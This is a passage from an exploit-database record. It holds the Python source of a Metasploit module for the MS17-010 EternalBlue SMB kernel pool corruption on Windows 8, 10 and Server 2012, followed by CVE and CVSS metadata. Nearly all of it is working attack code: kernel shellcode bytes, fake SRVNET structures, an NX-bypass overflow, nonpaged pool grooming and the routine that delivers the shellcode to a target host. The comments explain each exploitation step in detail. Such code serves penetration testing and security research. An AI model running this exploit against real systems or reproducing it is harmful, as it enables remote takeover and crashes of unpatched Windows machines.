'\\x41\\x5b\\x41\\x5a\\x41\\x59\\x41\\x58\\x5a\\x59\\x5d\\x58\\xc3\\x41\\x57'\n '\\x41\\x56\\x57\\x56\\x53\\x50\\x4c\\x8b\\x7d\\x00\\x49\\xc1\\xef\\x0c\\x49'\n '\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x66\\x41\\x81\\x3f\\x4d'\n '\\x5a\\x75\\xf1\\x4c\\x89\\x7d\\x08\\x65\\x4c\\x8b\\x34\\x25\\x88\\x01\\x00'\n '\\x00\\xbf\\x78\\x7c\\xf4\\xdb\\xe8\\x01\\x01\\x00\\x00\\x48\\x91\\xbf\\x3f'\n '\\x5f\\x64\\x77\\xe8\\xfc\\x00\\x00\\x00\\x8b\\x40\\x03\\x89\\xc3\\x3d\\x00'\n '\\x04\\x00\\x00\\x72\\x03\\x83\\xc0\\x10\\x48\\x8d\\x50\\x28\\x4c\\x8d\\x04'\n '\\x11\\x4d\\x89\\xc1\\x4d\\x8b\\x09\\x4d\\x39\\xc8\\x0f\\x84\\xc6\\x00\\x00'\n '\\x00\\x4c\\x89\\xc8\\x4c\\x29\\xf0\\x48\\x3d\\x00\\x07\\x00\\x00\\x77\\xe6'\n '\\x4d\\x29\\xce\\xbf\\xe1\\x14\\x01\\x17\\xe8\\xbb\\x00\\x00\\x00\\x8b\\x78'\n '\\x03\\x83\\xc7\\x08\\x48\\x8d\\x34\\x19\\xe8\\xf4\\x00\\x00\\x00\\x3d' + proc_hash +\n '\\x74\\x10\\x3d' + proc_hash + '\\x74\\x09\\x48\\x8b\\x0c' \n '\\x39\\x48\\x29\\xf9\\xeb\\xe0\\xbf\\x48\\xb8\\x18\\xb8\\xe8\\x84\\x00\\x00'\n '\\x00\\x48\\x89\\x45\\xf0\\x48\\x8d\\x34\\x11\\x48\\x89\\xf3\\x48\\x8b\\x5b'\n '\\x08\\x48\\x39\\xde\\x74\\xf7\\x4a\\x8d\\x14\\x33\\xbf\\x3e\\x4c\\xf8\\xce'\n '\\xe8\\x69\\x00\\x00\\x00\\x8b\\x40\\x03\\x48\\x83\\x7c\\x02\\xf8\\x00\\x74'\n '\\xde\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc0\\x4c\\x8d\\x0d\\xa9\\x00\\x00\\x00'\n '\\x55\\x6a\\x01\\x55\\x41\\x50\\x48\\x83\\xec\\x20\\xbf\\xc4\\x5c\\x19\\x6d'\n '\\xe8\\x35\\x00\\x00\\x00\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc9\\xbf\\x34\\x46'\n '\\xcc\\xaf\\xe8\\x24\\x00\\x00\\x00\\x48\\x83\\xc4\\x40\\x85\\xc0\\x74\\xa3'\n '\\x48\\x8b\\x45\\x20\\x80\\x78\\x1a\\x01\\x74\\x09\\x48\\x89\\x00\\x48\\x89'\n '\\x40\\x08\\xeb\\x90\\x58\\x5b\\x5e\\x5f\\x41\\x5e\\x41\\x5f\\xc3\\xe8\\x02'\n '\\x00\\x00\\x00\\xff\\xe0\\x53\\x51\\x56\\x41\\x8b\\x47\\x3c\\x41\\x8b\\x84'\n '\\x07\\x88\\x00\\x00\\x00\\x4c\\x01\\xf8\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20'\n '\\x4c\\x01\\xfb\\xff\\xc9\\x8b\\x34\\x8b\\x4c\\x01\\xfe\\xe8\\x1f\\x00\\x00'\n 
'\\x00\\x39\\xf8\\x75\\xef\\x58\\x8b\\x58\\x24\\x4c\\x01\\xfb\\x66\\x8b\\x0c'\n '\\x4b\\x8b\\x58\\x1c\\x4c\\x01\\xfb\\x8b\\x04\\x8b\\x4c\\x01\\xf8\\x5e\\x59'\n '\\x5b\\xc3\\x52\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\\xc2\\x85\\xc0\\x75'\n '\\xf6\\x92\\x5a\\xc3\\x55\\x53\\x57\\x56\\x41\\x57\\x49\\x8b\\x28\\x4c\\x8b'\n '\\x7d\\x08\\x52\\x5e\\x4c\\x89\\xcb\\x31\\xc0\\x44\\x0f\\x22\\xc0\\x48\\x89'\n '\\x02\\x89\\xc1\\x48\\xf7\\xd1\\x49\\x89\\xc0\\xb0\\x40\\x50\\xc1\\xe0\\x06'\n '\\x50\\x49\\x89\\x01\\x48\\x83\\xec\\x20\\xbf\\xea\\x99\\x6e\\x57\\xe8\\x65'\n '\\xff\\xff\\xff\\x48\\x83\\xc4\\x30\\x85\\xc0\\x75\\x45\\x48\\x8b\\x3e\\x48'\n '\\x8d\\x35\\x4d\\x00\\x00\\x00\\xb9\\x00\\x06\\x00\\x00\\xf3\\xa4\\x48\\x8b'\n '\\x45\\xf0\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x00\\x66\\x83'\n '\\x78\\x48\\x18\\x75\\xf6\\x48\\x8b\\x50\\x50\\x81\\x7a\\x0c\\x33\\x00\\x32'\n '\\x00\\x75\\xe9\\x4c\\x8b\\x78\\x20\\xbf\\x5e\\x51\\x5e\\x83\\xe8\\x22\\xff'\n '\\xff\\xff\\x48\\x89\\x03\\x31\\xc9\\x88\\x4d\\xf8\\xb1\\x01\\x44\\x0f\\x22'\n '\\xc1\\x41\\x5f\\x5e\\x5f\\x5b\\x5d\\xc3\\x48\\x92\\x31\\xc9\\x51\\x51\\x49'\n '\\x89\\xc9\\x4c\\x8d\\x05\\x0d\\x00\\x00\\x00\\x89\\xca\\x48\\x83\\xec\\x20'\n '\\xff\\xd0\\x48\\x83\\xc4\\x30\\xc3'\n )\n\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\nNTFEA_SIZE = 0x9000\n\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\n\n'''\nReverse from srvnet.sys (Win2012 R2 x64)\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\n\n// size 0x90\nstruct SRVNET_BUFFER_HDR {\n LIST_ENTRY list;\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. 
if 0x2 is set, go to lookaside.\n char unknown0[6];\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\n DWORD netRawBufferSize; // offset: 0x20\n DWORD ioStatusInfo;\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\n DWORD pad2;\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\n PMDL pmdl1; // point at offset 0x90 from this struct\n DWORD nByteProcessed; // 0x40\n char unknown4[4];\n QWORD smbMsgSize; // MUST be modified to size of all recv data\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\n QWORD pSrvNetWskStruct; // want to change to fake struct address\n DWORD unknown6; // 0x60\n char unknown7[12];\n char unknown8[0x20];\n};\n\nstruct SRVNET_BUFFER {\n char transportHeader[80]; // 0x50\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\n //MDL mdl1; // target\n};\n\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\n'''\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\n# Here is the important fields on x64\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. 
This value MUST be valid address because there is\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\n# This value MUST be exactly same as the number of bytes we send.\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\n# The value MUST point to valid (might be fake) struct.\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\n# - 0x90 (VOID*) : MDL.Next should be NULL\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\n# - 0x90 (VOID*) : MDL.Process should be NULL\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\n#\n#\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\n# Here is related field for freeing corrupted buffer\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\n# your shellcode as function argument\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\n# The last condition is your shellcode MUST return non-negative value. 
The easiest way to do is \"xor eax,eax\" before \"ret\".\n# Here is x64 assembly code for setting nByteProcessed field\n# - fetch SRVNET_BUFFER address from function argument\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\n# \\x48\\x01\\xd1 add rcx, rdx\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\n# - set nByteProcessed for trigger free after return\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\n\n# debug mode affects HAL heap. The 0xffffffffffd04000 address should be useable no matter what debug mode is.\n# The 0xffffffffffd00000 address should be useable when debug mode is not enabled\n# The 0xffffffffffd01000 address should be useable when debug mode is enabled\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd04000 # for put fake struct and shellcode\n\n# Note: feaList will be created after knowing shellcode size.\n\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\n# PTE of 0xffffffffffd00000 is at 0xfffff6ffffffe800\n# NX bit is at PTE_ADDR+7\n# MappedSystemVa = PTE_ADDR+7 - 0x7f\nSHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000\nPTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)\nfakeSrvNetBufferX64Nx = '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa\n\nfeaListNx = pack('<I', 0x10000)\nfeaListNx += ntfea9000\nfeaListNx 
+= pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\n# stop copying by invalid flag (can be any value except 0 and 0x80)\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\n\n\ndef createFakeSrvNetBuffer(sc_size):\n # 0x180 is size of fakeSrvNetBufferX64\n totalRecvSize = 0x80 + 0x180 + sc_size\n fakeSrvNetBufferX64 = '\\x00'*16\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\n fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0) # _, thisNonPagedPoolSize, _\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\n return fakeSrvNetBufferX64\n\ndef createFeaList(sc_size):\n feaList = pack('<I', 0x10000)\n feaList += ntfea9000\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\n # stop copying by invalid flag (can be any value except 0 and 0x80)\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\n return feaList\n\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\n# x64: fake struct is at ffffffff ffd00e00\n# offset 0x50: KSPIN_LOCK\n# offset 0x58: LIST_ENTRY must be valid address. 
cannot be NULL.\n# offset 0x110: array of pointer to function\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\n# some useful offset\n# offset 0x120: arg1 when invoking ptr to function\n# offset 0x128: arg2 when invoking ptr to function\n#\n# code path to get code exection after this struct is controlled\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\nfake_recv_struct = ('\\x00'*16)*5\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\nfake_recv_struct += ('\\x00'*16)*10\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\nfake_recv_struct += ('\\x00'*16)*3\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address\n\n\ndef getNTStatus(self):\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\nif not dependencies_missing:\n setattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\n\ndef sendEcho(conn, tid, data):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\n transCommand['Data'] = smb.SMBEcho_Data()\n\n transCommand['Parameters']['EchoCount'] = 1\n transCommand['Data']['Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('got good ECHO response')\n else:\n module.log('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n\n\n# override SMB.neg_session() to allow forcing ntlm authentication\nif not dependencies_missing:\n class MYSMB(smb.SMB):\n def __init__(self, remote_host, port, use_ntlmv2=True):\n self.__use_ntlmv2 
= use_ntlmv2\n smb.SMB.__init__(self, remote_host, remote_host, sess_port = port)\n\n def neg_session(self, extended_security = True, negPacket = None):\n smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)\n\ndef createSessionAllocNonPaged(target, port, size, username, password):\n conn = MYSMB(target, port, use_ntlmv2=False) # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set\n _, flags2 = conn.get_flags()\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\n if size >= 0xffff:\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n else:\n flags2 |= smb.SMB.FLAGS2_UNICODE\n reqSize = size\n conn.set_flags(flags2=flags2)\n\n pkt = smb.NewSMBPacket()\n\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\n sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()\n\n sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\n sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero\n sessionSetup['Parameters']['SessionKey'] = 0\n sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 
0 for NULL session\n sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS\n\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n if username:\n # Try login with valid user because anonymous user might get access denied on Windows Server 2012.\n # Note: If target allows only NTLMv2 authentication, the login will always fail.\n # support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n conn.set_flags(flags2=flags2)\n\n # new SMB packet to reset flags\n pkt = smb.NewSMBPacket()\n pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))\n # UnicodePasswordLen field is in Reserved for extended security format.\n sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)\n sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + '\\x00'*16\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n # lazy to check error code, just print fail message\n module.log('SMB1 session setup allocate nonpaged pool failed', 'error')\n sys.exit(1)\n\n\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\nif not dependencies_missing:\n class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\n structure = (\n ('TotalParameterCount', '<H=0'),\n ('TotalDataCount', '<H'),\n ('ParameterCount', '<H=0'),\n ('ParameterOffset', '<H=0'),\n ('ParameterDisplacement', '<H=0'),\n ('DataCount', '<H'),\n ('DataOffset', '<H'),\n ('DataDisplacement', '<H=0'),\n 
('FID', '<H=0'),\n )\n\ndef send_trans2_second(conn, tid, data, displacement):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n # assume no params\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\n\n transCommand['Parameters']['TotalParameterCount'] = 0\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+18\n transCommand['Data']['Pad1'] = ''\n\n transCommand['Parameters']['ParameterCount'] = 0\n transCommand['Parameters']['ParameterOffset'] = 0\n\n if len(data) > 0:\n pad2Len = (4 - fixedOffset % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = len(data)\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\n transCommand['Parameters']['DataDisplacement'] = displacement\n\n transCommand['Data']['Trans_Parameters'] = ''\n transCommand['Data']['Trans_Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n\n\ndef send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n command = pack('<H', setup)\n\n # Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\n transCommand['Parameters']['MaxSetupCount'] = 1\n transCommand['Parameters']['MaxParameterCount'] = len(param)\n transCommand['Parameters']['MaxDataCount'] = 0\n transCommand['Data'] = smb.SMBTransaction2_Data()\n\n transCommand['Parameters']['Setup'] = command\n transCommand['Parameters']['TotalParameterCount'] = len(param)\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+38 + len(command)\n if len(param) > 0:\n padLen 
= (4 - fixedOffset % 4 ) % 4\n padBytes = '\\xFF' * padLen\n transCommand['Data']['Pad1'] = padBytes\n else:\n transCommand['Data']['Pad1'] = ''\n padLen = 0\n\n transCommand['Parameters']['ParameterCount'] = len(param)\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\n\n if len(data) > 0:\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\n\n transCommand['Data']['Trans_Parameters'] = param\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB() # must be success\n if recvPkt.getNTStatus() == 0:\n module.log('got good NT Trans response')\n else:\n module.log('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n sys.exit(1)\n\n # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data\n i = firstDataFragmentSize\n while i < len(data):\n sendSize = min(4096, len(data) - i)\n if len(data) - i <= 4096:\n if not sendLastChunk:\n break\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\n i += sendSize\n\n if sendLastChunk:\n conn.recvSMB()\n return i\n\n\n# connect to target and send a large nbss size with data 0x80 bytes\n# this method is for allocating big nonpaged pool on target\ndef createConnectionWithBigSMBFirst80(target, port, for_nx=False):\n sk = socket.create_connection((target, port))\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\n # Also this is invalid SMB2 message.\n # I believe NSA exploit use SMB2 for hiding alert from IDS\n #pkt += '\\xfeSMB' # smb2\n # it can be anything even it is invalid\n pkt += 'BAAD' # can be any\n if 
for_nx:\n # MUST set no delay because 1 byte MUST be sent immediately\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\n else:\n pkt += '\\x00'*0x7c\n sk.send(pkt)\n return sk\n\n\ndef _exploit(target, port, feaList, shellcode, numGroomConn, username, password):\n # force using smb.SMB for SMB1\n conn = smb.SMB(target, target, sess_port = port)\n conn.login(username, password)\n server_os = conn.get_server_os()\n module.log('Target OS: '+server_os)\n if server_os.startswith(\"Windows 10 \"):\n build = int(server_os.split()[-1])\n if build >= 14393: # version 1607\n module.log('This exploit does not support this build: {} >= 14393'.format(build), 'error')\n sys.exit(1)\n elif not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\n module.log('This exploit does not support this target: {}'.format(server_os), 'error')\n sys.exit(1)\n\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n\n # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.\n # Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment\n progress = send_big_trans2(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\n\n # Another TRANS2_OPEN2 (0) with special feaList for disabling NX\n nxconn = smb.SMB(target, target, sess_port = port)\n nxconn.login(username, password)\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\n\n # create some big buffer at server\n # this buffer MUST NOT be big enough for overflown buffer\n allocConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE - 0x2010, username, password)\n\n # groom nonpaged pool\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\n srvnetConn = []\n 
for i in range(numGroomConn):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # create buffer size NTFEA_SIZE at server\n # this buffer will be replaced by overflown buffer\n holeConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE-0x10, username, password)\n # disconnect allocConn to free buffer\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\n allocConn.get_socket().close()\n\n # hope one of srvnetConn is next to holeConn\n for i in range(5):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # remove holeConn to create hole for fea buffer\n holeConn.get_socket().close()\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # first trigger, overwrite srvnet buffer struct for disabling NX\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\n recvPkt = nxconn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status for nx: INVALID_PARAMETER')\n else:\n module.log('bad response status for nx: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # send '\\x00' to disable nx\n for sk in srvnetConn:\n sk.send('\\x00')\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # second trigger, place fake struct and shellcode\n send_trans2_second(conn, tid, feaList[progress:], progress)\n recvPkt = conn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status: INVALID_PARAMETER')\n else:\n module.log('bad response status: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # a corrupted buffer will write recv data in designed memory address\n for sk in srvnetConn:\n sk.send(fake_recv_struct + shellcode)\n\n # execute 
shellcode\n for sk in srvnetConn:\n sk.close()\n\n # nicely close connection (no need for exploit)\n nxconn.disconnect_tree(tid)\n nxconn.logoff()\n nxconn.get_socket().close()\n conn.disconnect_tree(tid)\n conn.logoff()\n conn.get_socket().close()\n\n\ndef exploit(args):\n if dependencies_missing:\n module.log('Module dependencies (impacket) missing, cannot continue', 'error')\n sys.exit(1)\n\n # XXX: Normalize strings to ints and unset options to empty strings\n rport = int(args['RPORT'])\n numGroomConn = int(args['GroomAllocations'])\n smbuser = args['SMBUser'] if 'SMBUser' in args else ''\n smbpass = args['SMBPass'] if 'SMBPass' in args else ''\n\n # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload\n sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])\n\n if len(sc) > 0xe80:\n module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')\n sys.exit(1)\n\n # Now, shellcode is known. 
create a feaList\n feaList = createFeaList(len(sc))\n\n module.log('shellcode size: {:d}'.format(len(sc)))\n module.log('numGroomConn: {:d}'.format(numGroomConn))\n\n try:\n _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)\n # XXX: Catch everything until we know better\n except Exception as e:\n module.log(str(e), 'error')\n sys.exit(1)\n\n module.log('done')\n\n\nif __name__ == '__main__':\n module.run(metadata, exploit)\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 49}, "differentElements": ["published", "modified"], "edition": 43, "lastseen": "2020-01-12T02:00:54"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 